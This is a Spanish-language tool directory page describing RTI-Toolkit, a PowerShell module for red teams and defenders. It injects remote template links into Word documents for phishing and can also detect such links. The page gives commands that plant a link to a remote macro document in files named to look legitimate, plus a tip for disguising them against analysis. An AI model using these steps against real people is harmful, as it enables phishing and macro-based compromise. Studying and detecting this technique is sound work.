Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RTI-Toolkit — Kit de herramientas de PowerShell para ataques y defensa de inyección de plantillas remotas. Inserta enlaces maliciosos en documentos de Office Word para phishing, con módulos de identificación para blue teams. | Kitploit
Herramientas/GitHubGitHub/nickvourd/rti-toolkit
Herramientas de PhishingPhishingPruebas de PenetraciónRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

Kit de herramientas de PowerShell para ataques y defensa de inyección de plantillas remotas. Inserta enlaces maliciosos en documentos de Office Word para phishing, con módulos de identificación para blue teams.

Ver Repositorio
5594hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RTI-Toolkit

Kit de Inyección de Plantillas Remotas

Descripción

RTI-Toolkit es un kit de herramientas PowerShell de código abierto para el ataque de Inyección de Plantillas Remotas. Este kit incluye un script PowerShell llamado PS-Templator.ps1 que puede ser utilizado tanto desde una perspectiva ofensiva como defensiva.

La siguiente tabla presenta los módulos principales (cmdlets) de PS-Templator.ps1:

CmdletDescripciónPerspectiva
Invoke-TemplateImplementa enlaces de plantillas remotas dentro de plantillas predeterminadas de Office WordOfensiva
Invoke-RegularImplementa enlaces de plantillas remotas dentro de documentos normales de Office Word sin plantillaOfensiva
Invoke-IdentifyIdentifica enlaces de plantillas remotas dentro de documentos Office Word docx con/sin plantillaDefensiva

⚠️ PS-Templator.ps1 solo es compatible con archivos DOCX.

ℹ️ Esta herramienta está referenciada por el Instituto Nacional de Estándares y Tecnología (NIST) en la Base de Datos Nacional de Vulnerabilidades (NVD) en CVE-2025-65318 y CVE-2025-65319.

Versión

1.0.0

Licencia

Esta herramienta está licenciada bajo la License: MIT.

Agradecimientos

Un agradecimiento especial a mis amigos @Papadope9 y Stavros Gkounis (a.k.a purpl3ph03n1x), quienes brindaron una ayuda invaluable durante la fase de pruebas beta de la herramienta.

Esta herramienta fue inspirada durante una evaluación de Red Teaming de iCAST con @S1ckB0y1337 hace algunos años.

Supernova fue creada con ❤️ por @nickvourd.

Tabla de Contenidos

  • RTI-Toolkit
    • Descripción
    • Versión
    • Licencia
    • Agradecimientos
    • Tabla de Contenidos
    • Inyección de Plantillas Remotas (RTI)
    • Instalación
    • Cmdlets
      • Invoke-Template
        • Ejemplo de Invoke-Template
      • Invoke-Regular
        • Ejemplo de Invoke-Regular
        • Ejemplo 2 de Invoke-Regular
      • Invoke-Identify
        • Ejemplo de Invoke-Identify
        • Ejemplo 2 de Invoke-Identify
    • Referencias

Inyección de Plantillas Remotas (RTI)

La Inyección de Plantillas Remotas (RTI) en el contexto de Microsoft Office se refiere a un tipo específico de vulnerabilidad de seguridad que puede ser explotada a través de plantillas maliciosas en documentos de Office (por ejemplo, Word, Excel, PowerPoint).

Por ejemplo, en un archivo DOCX, el contenido se almacena en formato XML dentro del archivo comprimido, y algunos de estos archivos XML pueden hacer referencia a recursos o plantillas externas. Los atacantes pueden manipular estos archivos XML para insertar enlaces o contenido malicioso que potencialmente pueden explotar vulnerabilidades o engañar a los usuarios.

Este es un ataque basado en macros.

Instalación

Para cargar PS-Templator.ps1 como un módulo en memoria, ejecute el siguiente comando:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 funciona sin necesidad de instalar dependencias adicionales.

ℹ️ PS-Templator.ps1 funciona como módulo de PowerShell.

ℹ️ PS-Templator.ps1 probado en una máquina Windows 10 con Office 2019 Professional Plus.

Cmdlets

Invoke-Template

Invoke-Template es un cmdlet que implementa enlaces de plantillas remotas dentro de plantillas predeterminadas de Office Word.

Ejemplo de Invoke-Template

Suponiendo que tiene una plantilla predeterminada de Word, como una de estas:

All Words Templates

Guardada como, por ejemplo, 'Name.docx':

Default Word Template Document

Si usa el cmdlet Invoke-Template puede insertar un enlace malicioso dentro de este docx:

⚠️ Antes de ejecutar Invoke-Template, asegúrese de guardar el documento y cerrarlo (finalizar su proceso).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Resultado:

Invoke-Template-1

Como puede ver, el módulo Invoke-Template mantiene una copia de seguridad del documento original y proporciona la ruta completa al documento malicioso.

Desde una perspectiva de depuración, si convierte el docx malicioso a un archivo zip y va a /word/_rels/settings.xml.rels, puede ver el enlace malicioso:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular es un cmdlet que implementa enlaces de plantillas remotas dentro de documentos normales de Office Word sin plantillas.

Ejemplo de Invoke-Regular

Suponiendo que tiene un documento normal de Word sin plantilla, como este:

Blank Document

Guardado como, por ejemplo, 'Doc1.docx':

Word Document

Si usa el cmdlet Invoke-Regular puede insertar un enlace malicioso dentro de este docx:

⚠️ Antes de ejecutar Invoke-Regular, asegúrese de guardar el documento y cerrarlo (finalizar su proceso).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Resultado:

Invoke-Regular-1

Como puede ver, el módulo Invoke-Regular mantiene una copia de seguridad del documento original y proporciona la ruta completa al documento malicioso.

Desde una perspectiva de depuración, si convierte el docx malicioso a un archivo zip y va a /word/_rels/settings.xml.rels, puede ver el enlace malicioso:

Invoke-Regular-Debug-1

Ejemplo 2 de Invoke-Regular

Desde una perspectiva de OPSEC, puede usar -TemplateName junto con el módulo Invoke-Regular. Esto hará que su documento malicioso parezca más legítimo si alguien intenta analizarlo.

Aquí hay un ejemplo:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Resultado:

Invoke-Regular-Example-2

Desde una perspectiva de depuración, si convierte el docx malicioso a un archivo zip y va a /docProps/app.xml, puede ver el nombre de plantilla falso:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-Identify es un cmdlet que identifica enlaces de plantillas remotas dentro de documentos Office Word docx con/sin plantilla.

Ejemplo de Invoke-Identify

Suponiendo que tiene un documento malicioso de Word:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Resultado:

Invoke-Identify Malicous Example

Ejemplo 2 de Invoke-Identify

Suponiendo que tiene un documento de Word no malicioso:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Resultado:

Invoke-Identify Clean Example

Referencias

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub by John Woodman
  • Invoke-Templator GitHub by Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub by Inf0secRabbit
Descargar herramienta